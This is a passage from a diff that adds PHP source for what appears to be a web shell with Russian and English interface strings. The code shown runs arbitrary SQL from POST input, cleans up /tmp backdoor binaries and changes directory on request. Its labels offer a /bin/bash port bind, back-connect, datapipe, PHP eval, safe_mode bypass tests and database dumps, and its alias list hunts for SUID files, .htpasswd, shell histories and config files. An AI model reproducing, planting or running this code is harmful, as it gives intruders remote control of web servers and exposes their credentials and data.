rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +/* +&#1042;&#1099;&#1073;&#1086;&#1088; &#1103;&#1079;&#1099;&#1082;&#1072; +$language='eng' - &#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081; +$language='ru' - &#1072;&#1085;&#1075;&#1083;&#1080;&#1081;&#1089;&#1082;&#1080;&#1081; +*/ +$language='eng'; +$lang=array( +'ru_text1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1085;&#1072;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;', +'ru_text2' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;', +'ru_text3' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1091;', +'ru_text4' =>'&#1056;&#1072;&#1073;&#1086;&#1095;&#1072;&#1103; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103;', +'ru_text5' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;', +'ru_text6' =>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;', +'ru_text7' =>'&#1040;&#1083;&#1080;&#1072;&#1089;&#1099;', +'ru_text8' =>'&#1042;&#1099;&#1073;&#1077;&#1088;&#1080;&#1090;&#1077; &#1072;&#1083;&#1080;&#1072;&#1089;', +'ru_butt1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;', +'ru_butt2' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1080;&#1090;&#1100;', +'ru_text9' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077; &#1087;&#1086;&#1088;&#1090;&#1072; &#1080; &#1087;&#1088;&#1080;&#1074;&#1103;&#1079;&#1082;&#1072; &#1077;&#1075;&#1086; &#1082; /bin/bash', +'ru_text10'=>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100; &#1087;&#1086;&#1088;&#1090;', +'ru_text11'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072;', +'ru_butt3' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100;', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-&#1072;&#1076;&#1088;&#1077;&#1089;', +'ru_text14'=>'&#1055;&#1086;&#1088;&#1090;', +'ru_butt4' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;', +'ru_text15'=>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1089; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;', +'ru_text16'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_text17'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;', +'ru_text18'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;', +'ru_text19'=>'Exploits', +'ru_text20'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_text21'=>'&#1053;&#1086;&#1074;&#1086;&#1077; &#1080;&#1084;&#1103;', +'ru_text22'=>'datapipe', +'ru_text23'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;', +'ru_text24'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;', +'ru_text25'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;', +'ru_text26'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_butt5' =>'&#1047;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1090;&#1100;', +'ru_text28'=>'&#1056;&#1072;&#1073;&#1086;&#1090;&#1072; &#1074; safe_mode', +'ru_text29'=>'&#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1079;&#1072;&#1087;&#1088;&#1077;&#1097;&#1077;&#1085;', +'ru_butt6' =>'&#1057;&#1084;&#1077;&#1085;&#1080;&#1090;&#1100;', +'ru_text30'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1092;&#1072;&#1081;&#1083;&#1072;', +'ru_butt7' =>'&#1042;&#1099;&#1074;&#1077;&#1089;&#1090;&#1080;', +'ru_text31'=>'&#1060;&#1072;&#1081;&#1083; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;', +'ru_text32'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; PHP &#1082;&#1086;&#1076;&#1072;', +'ru_text33'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; open_basedir &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1080; cURL', +'ru_butt8' =>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1080;&#1090;&#1100;', +'ru_text34'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1102; include', +'ru_text35'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1079;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1091; &#1092;&#1072;&#1081;&#1083;&#1072; &#1074; mysql', +'ru_text36'=>'&#1041;&#1072;&#1079;&#1072;', +'ru_text37'=>'&#1051;&#1086;&#1075;&#1080;&#1085;', +'ru_text38'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100;', +'ru_text39'=>'&#1058;&#1072;&#1073;&#1083;&#1080;&#1094;&#1072;', +'ru_text40'=>'&#1044;&#1072;&#1084;&#1087; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;', +'ru_butt9' =>'&#1044;&#1072;&#1084;&#1087;', +'ru_text41'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1077;', +'ru_text42'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072;', +'ru_text43'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083;', +'ru_butt10'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100;', +'ru_butt11'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100;', +'ru_text44'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072; &#1085;&#1077;&#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;! &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1076;&#1083;&#1103; &#1095;&#1090;&#1077;&#1085;&#1080;&#1103;!', +'ru_text45'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1093;&#1088;&#1072;&#1085;&#1077;&#1085;', +'ru_text46'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; phpinfo()', +'ru_text47'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1085;&#1072;&#1089;&#1090;&#1088;&#1086;&#1077;&#1082; php.ini', +'ru_text48'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1099;&#1093; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074;', +'ru_text49'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072; &#1089; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;', +'ru_text50'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1086;&#1088;&#1077;', +'ru_text51'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1072;&#1084;&#1103;&#1090;&#1080;', +'ru_text52'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;', +'ru_text53'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;', +'ru_text54'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;', +'ru_butt12'=>'&#1053;&#1072;&#1081;&#1090;&#1080;', +'ru_text55'=>'&#1058;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;', +'ru_text56'=>'&#1053;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1086;', +'ru_text57'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100; &#1060;&#1072;&#1081;&#1083;/&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;', +'ru_text58'=>'&#1048;&#1084;&#1103;', +'ru_text59'=>'&#1060;&#1072;&#1081;&#1083;', +'ru_text60'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;', +'ru_butt13'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;', +'ru_text61'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;', +'ru_text62'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;&#1072;', +'ru_text63'=>'&#1060;&#1072;&#1081;&#1083; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;', +'ru_text64'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1072;', +'ru_text65'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;', +'ru_text66'=>'&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'&#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;', +'ru_text69'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;1', +'ru_text70'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;2', +'ru_text71'=>"&#1042;&#1090;&#1086;&#1088;&#1086;&#1081; &#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;:\r\n- &#1076;&#1083;&#1103; CHOWN - &#1080;&#1084;&#1103; &#1085;&#1086;&#1074;&#1086;&#1075;&#1086; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; &#1080;&#1083;&#1080; &#1077;&#1075;&#1086; UID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHGRP - &#1080;&#1084;&#1103; &#1075;&#1088;&#1091;&#1087;&#1087;&#1099; &#1080;&#1083;&#1080; GID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHMOD - &#1094;&#1077;&#1083;&#1086;&#1077; &#1095;&#1080;&#1089;&#1083;&#1086; &#1074; &#1074;&#1086;&#1089;&#1100;&#1084;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1084; &#1087;&#1088;&#1077;&#1076;&#1089;&#1090;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1080; (&#1085;&#1072;&#1087;&#1088;&#1080;&#1084;&#1077;&#1088; 0777)", +'ru_text72'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;', +'ru_text73'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;', +'ru_text74'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;', +'ru_text75'=>'* &#1084;&#1086;&#1078;&#1085;&#1086; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100; &#1088;&#1077;&#1075;&#1091;&#1083;&#1103;&#1088;&#1085;&#1086;&#1077; &#1074;&#1099;&#1088;&#1072;&#1078;&#1077;&#1085;&#1080;&#1077;', +'ru_text76'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093; &#1089; &#1087;&#1086;&#1084;&#1086;&#1097;&#1100;&#1102; &#1091;&#1090;&#1080;&#1083;&#1080;&#1090;&#1099; find', +'ru_text77'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1091;&#1088;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;', +'ru_text78'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099;', +'ru_text79'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1089;&#1090;&#1086;&#1083;&#1073;&#1094;&#1099;', +'ru_text80'=>'&#1058;&#1080;&#1087;', +'ru_text81'=>'&#1057;&#1077;&#1090;&#1100;', +'ru_text82'=>'&#1041;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;', +'ru_text83'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072;', +'ru_text84'=>'SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;', +'ru_text85'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1074; MSSQL &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +); +/* +&#1040;&#1083;&#1080;&#1072;&#1089;&#1099; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; +&#1055;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1090; &#1080;&#1079;&#1073;&#1077;&#1078;&#1072;&#1090;&#1100; &#1084;&#1085;&#1086;&#1075;&#1086;&#1082;&#1088;&#1072;&#1090;&#1085;&#1086;&#1075;&#1086; &#1085;&#1072;&#1073;&#1086;&#1088;&#1072; &#1086;&#1076;&#1085;&#1080;&#1093; &#1080; &#1090;&#1077;&#1093;-&#1078;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;. ( &#1057;&#1076;&#1077;&#1083;&#1072;&#1085;&#1086; &#1073;&#1083;&#1072;&#1075;&#1086;&#1076;&#1072;&#1088;&#1103; &#1084;&#1086;&#1077;&#1081; &#1087;&#1088;&#1080;&#1088;&#1086;&#1076;&#1085;&#1086;&#1081; &#1083;&#1077;&#1085;&#1080; ) +&#1042;&#1099; &#1084;&#1086;&#1078;&#1077;&#1090;&#1077; &#1089;&#1072;&#1084;&#1080; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1090;&#1100; &#1080;&#1083;&#1080; &#1080;&#1079;&#1084;&#1077;&#1085;&#1103;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>&#1080;</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new 